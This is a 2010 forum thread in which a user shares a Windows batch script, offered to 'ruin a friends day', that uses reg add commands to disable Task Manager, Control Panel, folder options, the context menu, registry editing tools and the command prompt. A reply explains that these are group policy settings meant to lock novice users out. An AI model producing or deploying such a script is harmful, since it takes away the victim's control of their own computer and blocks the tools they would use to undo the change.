Batch Script Payloads

Discussion in 'Programming' started by Cleptography, Sep 6, 2010.

  1. Cleptography

    Cleptography New Member

    Joined:
    Sep 2, 2010
    Messages:
    39
    Likes Received:
    7
    Trophy Points:
    0
    This annoying thing is nothing more than a simple list of payloads you could stick in a .bat file to ruin a friends day. :nonod:

    Batch Script Payloads
    -------------------------
    Code:
    @echo off
    
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoControlPanel /t REG_DWORD /d 00000001
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoFolderOptions /t REG_DWORD /d 00000001
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoViewContextMenu /t REG_DWORD /d 00000001
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableRegistryTools /t REG_DWORD /d 00000001
    reg add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 00000002
     
  2. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
  3. tennsoccerdr

    tennsoccerdr New Member

    Joined:
    Oct 19, 2010
    Messages:
    24
    Likes Received:
    1
    Trophy Points:
    0
    So what is it going to do to them?
     
  4. Cleptography

    Cleptography New Member

    Joined:
    Sep 2, 2010
    Messages:
    39
    Likes Received:
    7
    Trophy Points:
    0
    To the novice user this will disallow them to use certain programs and apps on windows.
    It's really nothing more than some group policy settings.
    Here are a few more than you can add to the list.
    You can get them here:
    http://msdn.microsoft.com/en-us/library/ms815238.aspx
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice